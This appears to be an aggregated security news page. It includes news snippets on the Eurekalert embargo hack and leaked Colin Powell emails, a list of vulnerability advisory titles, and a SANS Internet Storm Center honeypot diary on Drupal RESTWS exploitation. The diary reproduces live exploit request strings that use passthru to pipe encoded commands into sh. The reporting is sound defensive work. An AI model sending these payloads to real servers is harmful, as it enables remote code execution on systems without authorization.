(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

For many science journalists, a week would not be complete without one or more trips to the Eurekalert website. Put together by the American Association for the Advancement of Science, Eurekalert is one-stop-shopping for press releases about the latest scientific findings, aggregating material provided by scientific journals, research institutions, and more.

If you're an established science journalist, you can also sign up for access to news before it's news. Log in with the right credentials, and you can see press releases and, in many cases, entire research papers up to a week before they're unleashed on the public. You just have to agree to never publish anything about the work until a specific date and time—the information is under an embargo until then.

Late Tuesday night, however, access to the site vanished, replaced by a notice that the site had been hacked and that the hackers had started leaking embargoed press releases. Only two releases made it out before access was pulled, and if those are anything to go on, the hackers have absolutely no sense of what makes for cutting-edge science.

Read 6 remaining paragraphs | Comments

 

Add former US Secretary of State Colin Powell to the list of high-ranking Washington insiders whose leaked e-mails are rankling their peers with just weeks to go before the US presidential election.

DC Leaks, a site that researchers at security firm ThreatConnect have linked to the Russian government, has published 26 months of Powell's e-mails, spanning from June 2014 to last month, news organizations reported Wednesday. The trove, which contains highly candid comments lambasting presidential candidates Donald Trump and Hillary Clinton, are part of a new batch that's separate from Powell e-mails leaked a few years ago. Powell aides reportedly confirmed the new compromise, telling The New York Times that the leaked messages "are his e-mails."

In the e-mails, Powell describes Trump as a "national disgrace" and portrays the candidate as someone who is unfit to be president.

Read 6 remaining paragraphs | Comments

 
[SECURITY] [DSA 3666-1] mysql-5.5 security update
 
APPLE-SA-2016-09-14-1 iOS 10.0.1
 
LibTIFF CVE-2016-3945 Arbitrary Command Execution Vulnerability
 
LibTIFF CVE-2015-8665 Out Of Bounds Read Denial of Service Vulnerability
 
SAP HANA Information Disclosure Vulnerability
 

Attackers usually dont have to worry much about Drupal administrators applying patches. The majority of exploit attempts I see in our honeypots use pretty ancient vulnerabilities. So I was happy to see a script kiddie go the extra mile and use a vulnerabilityreleased in July of this year [1] [2].

The vulnerability itself is very straight forward. The attacker can send arbitrary php code that will be executed on the server. No special encoding beyond URL encoding appears to be required.

Here is the exploit string as found in my logs:

GET /?q=taxonomy_vocabulary//passthru/printf+%22printf%5C040%5C047%5C134%5C060%5C066%5C061%5C134%5C061%5C060%5C065%5C134%5C061%5C061%5C066%5C134%5C061%5C061%5C062%5C134%5C061%5C061%5C066%5C134%5C061%5C062%5C060%5C134%5C061%5C060%5C062%5C134%5C061%5C062%5C065%5C134%5C061%5C066%5C062%5C134%5C061%5C062%5C063%5C047%22%7Csh+

Decoding this leads to:

printf\040\047\134\060\066\061\134\061\060\065\134\061\061\066\134\061\061\062\134\061\061\066\134\061\062\060\134\061\060\062\134\061\062\065\134\061\066\062\134\061\062\063\047|sh

which is actually double octal encoded and would just print the string 1ENJNPBUrS, likely trying to find indicators of vulnerable systems.

So far in our honeypot, I got 44 attempts today from 16 different IPs. Expliot attempts go back to July, just after the vulnerability was announced. Earlier versions use a slightly different test:

GET /?q=taxonomy_vocabulary/XuMWvA8KTq/passthru/echo%20ktKPt14N9p HTTP/1.1

So they skip the octal/URL encoding part.

I used Bings IP address search to check some of the IP addresses attacking the honeypot (for example, try a Bing search for ip:117.240.207.43, but dont click on the result. The site is likely compromised). Most of the IPs appear to be running Drupal sites and are likely exploited and used to scan for more victims.

In my quick sampling, I didnt find any obvious malicious content on these sites. I would have expected some advertisement or maybe even malware, but maybe they are still building out their network.

[1]https://www.mehmetince.net/exploit/drupal-restws-module-7x-remote-php-code-execution
[2]https://www.drupal.org/node/2765567

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Microsoft ASP.NET Core MVC Multiple Privilege Escalation Vulnerabilities
 
Multiple Cisco Products CVE-2015-6358 Man in the Middle Information Disclosure Vulnerability
 
Multiple VMware Workstation Products CVE-2016-7086 Remote Code Execution Vulnerability
 
Internet Storm Center Infocon Status